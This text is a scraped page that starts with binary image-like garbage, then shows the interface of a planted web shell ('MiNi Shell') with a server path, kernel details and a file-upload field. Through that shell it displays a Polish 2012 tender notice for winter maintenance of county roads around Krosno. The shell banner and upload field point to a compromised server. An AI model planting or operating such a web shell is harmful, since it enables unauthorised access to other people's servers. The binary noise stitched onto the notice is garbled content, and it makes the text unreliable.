JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120920/356732-N-2012.html

<p class="kh_header"><b>Krosno: Usługi związane z zimowym utrzymaniem dróg powiatowych w sezonie zimowym 2012/2013 - II przetarg nieograniczony</b><br>
<b>Numer ogłoszenia: 356732 - 2012; data zamieszczenia: 20.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Krośnie , ul. Bieszczadzka 1, 38-400 Krosno, woj. podkarpackie, tel. 013 4375796, faks 013 4366037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdkrosno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi związane z zimowym utrzymaniem dróg powiatowych w sezonie zimowym 2012/2013 - II przetarg nieograniczony.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Zamówienie zostało podzielone na następujące części:

1. Część 5: Rejon 5
2. Część 10: Rejon Powiat Krośnieński 
3. Część 11: Rejon Jaśliska
4. Część 12: Rejon Czarnorzeki
5. Część 13: Rejon Puławy
6. Część 14: Rejon Odrzykoń
7. Część 15: Rejon Klimkówka

II. Zakres świadczenia usług obejmuje: 
-Odśnieżanie i utrzymywanie przejezdności dróg na zadaniu objętym umową (z zastrzeżeniem pkt 3.9 SIWZ) wg obowiązujących standardów.
-Zwalczanie śliskości na odcinkach wyznaczonych do posypywania dróg na zadaniu objętym umową. 
-Materiały niezbędne do zwalczania śliskości zapewni Zamawiający (z zastrzeżeniem pkt.3.3 SIWZ). 
-Ręczne rozsypywanie materiałów na kratach wsypowych piaskarek podczas załadunku.
-Załadunek materiałów uszorstniających na piaskarki (dotyczy części - Rejon 5, 8, 11, 12, 13, 14,15 zamówienia) we własnym zakresie.

III. W Części 13: Rejon Puławy; Części 14: Rejon Odrzykoń; Części 5: Rejon 5 Wykonawca zobowiązany jest do zabezpieczenia się w materiały uszorstniające niezbędne do zwalczania śliskości we własnym zakresie i na własny koszt. (Zastosowane materiały winny być jakościowo nie gorsze niż materiały używane na pozostałych drogach przy zimowym utrzymaniu dróg) - informacji udziela kierownik PZD w Krośnie.

IV.  Wykonawca jest zobowiązany do ubezpieczenia OC usług związanych z zimowym utrzymaniem dróg. 

V. Wykonawca jest zobowiązany do posiadania telefonu komórkowego w celu sprawnej komunikacji pomiędzy Dyżurnym Zimowego Utrzymania Dróg - zwanym dalej Dyżurnym, a Wykonawcą.

VI. Akcją zimową kieruje Dyżurny Zimowego Utrzymania Dróg z Obwodu Drogowo Mostowego w Dukli.

VII. Wykonawca, w czasie obowiązywania umowy, jest zobowiązany do świadczenia usługi na polecenie Dyżurnego o każdej porze w ciągu doby i w każdy dzień tygodnia.

VIII. Zamawiający zobowiązuje się do zapłaty ? ofertowej najniższej ceny za godz. pracy sprzętu, za każdą godz. pozostawania w dyspozycji, na polecenie dyżurnego. 

IX. W sytuacjach, spowodowanych ciężkimi warunkami zimowymi lub niewystarczającą ilością sprzętu spowodowaną awariami lub innymi zdarzeniami losowymi, Zamawiający zastrzega sobie prawo skierowania sprzętu na inne drogi powiatowe nie ujęte umową. Wynagrodzenie za świadczenie usług na drogach nie objętych umową odbywać się będzie wg takich samych stawek jak na drogach objętych umową.

X. Zamawiający zastrzega sobie prawo do sprawdzenia przydatności do wykonania oferowanego sprzętu. Jeżeli oferowany sprzęt nie spełnia warunków SIWZ lub jest nie sprawny technicznie, Zamawiający zastrzega sobie prawo odmowy podpisania z Oferentem umowy do czasu usunięcia nieprawidłowości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje stosowanie zamówień uzupełniających z art.67 ust 1 pkt6 stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy wszystkich warunków udziału w postępowaniu oraz opisu sposobu dokonywania oceny spełniania tych warunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie 
   z art. 22 ustawy Prawo zamówień publicznych,
2. Wypełniony formularz OFERTY,
3. Parafowany wzór umowy 
Pkt 4 dotyczy wykonawcy, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej
4. Oświadczenie o braku podstaw do wykluczenia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony przewidują możliwość zmiany terminu realizacji umowy ze względu na warunki atmosferyczne. 2. Zamawiający zastrzega sobie prawo zmiany umowy w części dotyczącej maksymalnej wartości umowy, o której mowa w § 7, ust.4 umowy - ze względu na zmniejszone lub zwiększone potrzeby Zamawiającego wynikające z bieżącego utrzymania dróg w danym sezonie. 3. Zamawiający może odstąpić od umowy z przyczyn objętych w art. 145 ustawy Prawo zamówień publicznych. 4.W przypadku nienależytego wykonywania przedmiotu zamówienia, Zamawiający może rozwiązać umowę w trybie natychmiastowym. 5. Zamawiający może w przypadku niewykonania umowy, zlecić na koszt i ryzyko Wykonawcy realizację umowy w zakresie niezbędnym do funkcjonowania drogi w okresie zimowym innemu podmiotowi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdkrosno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Krośnie
ul. Bieszczadzka 1
38-400 Krosno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2012 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Krośnie
38-400 Krosno, ul. Bieszczadzka 1, pok. 613.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 5: Rejon 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje trasy:
Trasa 1: Praca /  droga Nr 1844R Przybówka - Niepla - Przybówka do dr. woj.
-droga Nr 1845R Przybówka - Chrząstówka do gr. z powiat. Jasło
-droga Nr 1942R Chrząstówka - Bajdy
-droga Nr 1943R Bajdy do dr. woj. -Bajdy  
-droga Nr 1943R Bajdy - Jaszczew do dr. K28 -do dr. Nr 1944R
-droga Nr 1944R Jaszczew - Ustrobna do dr. woj. -Bajdy
-droga Nr 1942R - droga Nr 1845R (koniec trasy)	
Długość trasy - 31,00km
Wymagania sprzętowe: 
Ilość wymaganego sprzętu do realizacji zadania - 1 szt. nośników o mocy silnika min. 240KM, wyposażonych w pług dwustronny średni i zamiennie w pług jednostronny średni z lemieszem gumowym, piaskarkę P1 lub podobną. 
Zamawiający dopuszcza użycie sprzętu innego niż wymieniony, lecz zapewniającego należytą realizację zadania i zaakceptowanego przez Zamawiającego.
Inne wymagania:
Ładowarka o pojemności łyżki 0,15-0,25m3
Plac składowy na materiały uszorstniające w ilości min. 100m3 
Baza sprzętowo - materiałowa: W siedzibie Oferenta
Materiały niezbędne do zwalczania śliskości zapewnia Wykonawca 

Zamawiający żąda przedłożenia oświadczenia o posiadaniu placu składowego i w/w sprzętu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 10: Rejon Powiat Krośnieński.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmuje wszystkie drogi powiatowe i polega na podstawieniu nośnika o mocy silnika min. 250KM i z napędem na min. 2 osie wyposażonego w pług dwustronny ciężki z lemieszem stalowym. 
Baza sprzętowo - materiałowa: Obwód Drogowo Mostowy w Dukli
Zamawiający żąda przedłożenia oświadczenia o posiadaniu w/w sprzętu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 11: Rejon Jaśliska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje drogi: 
1. Nr 2116R Jaśliska - Czeremcha - Granica Państwa na odcinku Posada Jaśliska - Jaśliska - Lipowiec, 
2. Nr 2117R Wola Niżna - Wola Wyżna 
									                         Długość trasy - 14,5km						
Wymagania sprzętowe: 
Ilość wymaganego sprzętu do realizacji zadania - 1 szt. nośników o mocy silnika min. 240KM, wyposażonych w pług dwustronny średni i zamiennie w pług jednostronny średni z lemieszem gumowym, piaskarkę P1 lub podobną.
Zamawiający dopuszcza użycie sprzętu innego niż wymieniony, lecz zapewniającego należytą realizację zadania i zaakceptowanego przez Zamawiającego. 

Inne wymagania:
Ładowarka o pojemności łyżki 0,15-0,25m3
Plac składowy na materiały uszorstniające w ilości min. 100m3 
Baza sprzętowo - materiałowa: W siedzibie Oferenta
Materiały niezbędne do zwalczania śliskości zapewnia Zamawiający 

Zamawiający żąda przedłożenia oświadczenia o posiadaniu placu składowego i w/w sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 12: Rejon Czarnorzeki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje drogi: 
Nr 1962R Krosno - Głębokie - Czarnorzeki - Jasienica Rosielna na odcinku Głębokie -Czarnorzeki
Nr 1961R Odrzykoń - Sporne                                
Długość trasy - 5,0km

Wymagania sprzętowe: 
Ilość wymaganego sprzętu do realizacji zadania - 1 szt. nośników o mocy silnika min. 240KM, wyposażonych w pług dwustronny średni i zamiennie w pług jednostronny średni z lemieszem gumowym, piaskarkę P1 lub podobną. 
Zamawiający dopuszcza użycie sprzętu innego niż wymieniony, lecz zapewniającego należytą realizację zadania i zaakceptowanego przez Zamawiającego.

Inne wymagania:
Ładowarka o pojemności łyżki 0,15-0,25m3
Plac składowy na materiały uszorstniające w ilości min. 100m3 
Baza sprzętowo - materiałowa: W siedzibie Oferenta
Materiały niezbędne do zwalczania śliskości zapewnia Zamawiający 

Zamawiający żąda przedłożenia oświadczenia o posiadaniu placu składowego i w/w sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 13: Rejon Puławy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje drogi: 
1.	Nr 2113R Pastwiska - Puławy, 
2.	Nr 2114R Rudawka Rymanowska - Wisłoczek, 
3.	Nr 2115R Puławy przez wieś.
Długość trasy - 14,0km

Wymagania sprzętowe: 
Ilość wymaganego sprzętu do realizacji zadania - 1 szt. nośników o mocy silnika min. 240KM, wyposażonych w pług dwustronny średni i zamiennie w pług jednostronny średni z lemieszem gumowym, piaskarkę P1 lub podobną. 
Zamawiający dopuszcza użycie sprzętu innego niż wymieniony, lecz zapewniającego należytą realizację zadania i zaakceptowanego przez Zamawiającego. 

Inne wymagania:
Ładowarka o pojemności łyżki 0,15-0,25m3
Plac składowy na materiały uszorstniające w ilości min. 100m3 
Baza sprzętowo - materiałowa: W siedzibie Oferenta
Materiały niezbędne do zwalczania śliskości 

Zamawiający żąda przedłożenia oświadczenia o posiadaniu materiału niezbędnego do zwalczania śliskości, placu składowego i w/w sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część 14: Rejon Odrzykoń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje trasy:
Trasa 1: Praca / -droga Nr 1924R Kobyle - Bratkówka - Odrzykoń od dr. Nr. 1941R w m. Łączki Jagiellońskie - do dr. Nr 1944R Jaszczew - Ustrobna - Bratkówka
- droga Jaszczew - Ustrobna - Bratkówka do dr. woj. Nr 990 - powrót do
 drogi Nr 1924R 
- droga Nr 1924R Kobyle - Bratkówka - Odrzykoń do dr. 1960R Krosno -
Odrzykoń
-droga Nr 1960R Krosno - Odrzykoń do dr. Woj. Nr 990
- droga Nr 1960R Krosno - Odrzykoń do końca
-droga Nr 1960R Krosno - Odrzykoń do dr. Nr 1924R Kobyle - Bratkówka -
 Odrzykoń 
- droga Nr 1924R Kobyle - Bratkówka - Odrzykoń do dr. Nr 1940R
- droga 1940R odcinek Bratkówka - Rzepnik ( do końca naw. bitumicznej ) 
- powrót do dr. 1924R
- droga 1924R odcinek Bratkówka - Łączki Jagiellońskie do dr. 1941R
     ( koniec trasy)
 								Długość trasy - 25,00km

Wymagania sprzętowe: 
Ilość wymaganego sprzętu do realizacji zadania - 1 szt. nośników o mocy silnika min. 240KM, wyposażonych w pług dwustronny średni i zamiennie w pług jednostronny średni z lemieszem gumowym, piaskarkę P1 lub podobną. 
Zamawiający dopuszcza użycie sprzętu innego niż wymieniony, lecz zapewniającego należytą realizację zadania i zaakceptowanego przez Zamawiającego.

Inne wymagania:
Ładowarka o pojemności łyżki 0,15-0,25m3
Plac składowy na materiały uszorstniające w ilości min. 100m3 
Baza sprzętowo - materiałowa: W siedzibie Oferenta
Materiały niezbędne do zwalczania śliskości 

Zamawiający żąda przedłożenia oświadczenia o posiadaniu materiału niezbędnego do zwalczania śliskości, placu składowego i w/w sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część 15: Rejon Klimkówka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje drogi: 
Nr 2009R Klimkówka p. wieś
Długość trasy - 8,1 km

Wymagania sprzętowe: 
Ilość wymaganego sprzętu do realizacji zadania - 1 szt. nośników o mocy silnika min. 240KM, wyposażonych w pług dwustronny średni i zamiennie w pług jednostronny średni z lemieszem gumowym, piaskarkę P1 lub podobną. 
Zamawiający dopuszcza użycie sprzętu innego niż wymieniony, lecz zapewniającego należytą realizację zadania. i zaakceptowanego przez Zamawiającego.

Inne wymagania:
Ładowarka o pojemności łyżki 0,15-0,25m3
Plac składowy na materiały uszorstniające w ilości min. 100m3 
Baza sprzętowo - materiałowa: W siedzibie Oferenta
Materiały niezbędne do zwalczania śliskości 

